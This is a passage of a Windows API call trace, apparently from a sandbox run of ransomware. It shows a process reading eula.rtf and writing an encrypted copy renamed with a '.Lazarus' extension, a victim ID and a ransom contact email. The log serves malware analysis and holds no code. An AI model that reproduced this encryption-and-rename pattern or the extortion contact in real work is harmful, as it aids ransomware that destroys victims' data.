dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78490, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042") returned 27 [0068.074] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042" (normalized: "c:\\588bce7c90097ed212\\1042"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.074] GetLastError () returned 0x5 [0068.074] GetLastError () returned 0x5 [0068.074] SetLastError (dwErrCode=0x5) [0068.074] GetLastError () returned 0x5 [0068.074] SetLastError (dwErrCode=0x5) [0068.074] GetLastError () returned 0x5 [0068.074] SetLastError (dwErrCode=0x5) [0068.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78490 | out: hHeap=0x20000) returned 1 [0068.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0068.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0068.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0068.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0068.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0068.075] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="1043", cAlternateFileName="")) returned 1 [0068.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0068.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0068.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0068.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0068.075] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x781d0 [0068.075] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.075] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x318f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0068.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0068.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0068.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0068.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0068.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0068.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0068.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0068.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0068.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0068.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0068.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0068.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0068.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0068.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0068.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0068.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0068.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0068.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x717c0 [0068.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0068.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0068.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0068.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0068.076] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.076] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.076] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.076] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0068.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.076] AreFileApisANSI () returned 1 [0068.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1042\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1042\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0068.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0068.076] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.076] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0068.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0068.077] AreFileApisANSI () returned 1 [0068.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69210 [0068.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x69210, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 36 [0068.077] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0068.077] GetFileType (hFile=0x420) returned 0x1 [0068.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0068.077] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0068.078] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0068.078] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0068.078] CloseHandle (hObject=0x420) returned 1 [0068.079] AreFileApisANSI () returned 1 [0068.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0068.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 36 [0068.079] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0068.079] GetFileType (hFile=0x420) returned 0x1 [0068.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0068.079] CloseHandle (hObject=0x420) returned 1 [0068.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0068.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0068.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0068.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0068.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0068.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0068.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0068.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0068.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0068.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0068.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0068.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0068.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0068.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0068.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0068.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0068.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0068.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0068.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0068.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0068.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.080] AreFileApisANSI () returned 1 [0068.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0068.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 36 [0068.080] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x318f)) returned 1 [0068.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0068.080] AreFileApisANSI () returned 1 [0068.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0068.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0068.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0068.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0068.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0068.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0068.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0068.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0068.080] GetLastError () returned 0x0 [0068.080] SetLastError (dwErrCode=0x0) [0068.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e030 [0068.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0068.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8be28 [0068.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0068.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0068.081] GetLastError () returned 0x0 [0068.081] SetLastError (dwErrCode=0x0) [0068.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0068.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x693f0 [0068.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0068.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75dc8 [0068.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0068.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0068.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0068.081] AreFileApisANSI () returned 1 [0068.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0068.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0068.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0068.081] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0068.235] GetFileType (hFile=0x420) returned 0x1 [0068.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0068.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0068.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0068.236] AreFileApisANSI () returned 1 [0068.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0068.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 36 [0068.236] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.236] GetFileType (hFile=0x410) returned 0x1 [0068.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0068.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0068.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.237] GetLastError () returned 0x0 [0068.237] SetLastError (dwErrCode=0x0) [0068.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0068.237] GetLastError () returned 0x0 [0068.237] SetLastError (dwErrCode=0x0) [0068.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0068.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0068.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0068.237] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0068.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0068.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0068.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0068.239] GetLastError () returned 0x0 [0068.240] SetLastError (dwErrCode=0x0) [0068.240] GetLastError () returned 0x0 [0068.240] SetLastError (dwErrCode=0x0) [0068.240] GetLastError () returned 0x0 [0068.240] SetLastError (dwErrCode=0x0) [0068.240] GetLastError () returned 0x0 [0068.240] SetLastError (dwErrCode=0x0) [0068.240] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.240] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.241] GetLastError () returned 0x0 [0068.241] SetLastError (dwErrCode=0x0) [0068.241] GetLastError () returned 0x0 [0068.241] SetLastError (dwErrCode=0x0) [0068.242] GetLastError () returned 0x0 [0068.242] SetLastError (dwErrCode=0x0) [0068.242] GetLastError () returned 0x0 [0068.242] SetLastError (dwErrCode=0x0) [0068.242] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.242] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.242] GetLastError () returned 0x0 [0068.242] SetLastError (dwErrCode=0x0) [0068.242] GetLastError () returned 0x0 [0068.242] SetLastError (dwErrCode=0x0) [0068.242] GetLastError () returned 0x0 [0068.243] SetLastError (dwErrCode=0x0) [0068.243] GetLastError () returned 0x0 [0068.243] SetLastError (dwErrCode=0x0) [0068.243] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x18f, lpOverlapped=0x0) returned 1 [0068.243] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0068.243] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.243] GetLastError () returned 0x0 [0068.243] SetLastError (dwErrCode=0x0) [0068.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xf) returned 0x7d6c0 [0068.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0068.243] GetLastError () returned 0x0 [0068.243] SetLastError (dwErrCode=0x0) [0068.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0068.244] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0x190, lpOverlapped=0x0) returned 1 [0068.244] GetLastError () returned 0x0 [0068.244] SetLastError (dwErrCode=0x0) [0068.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 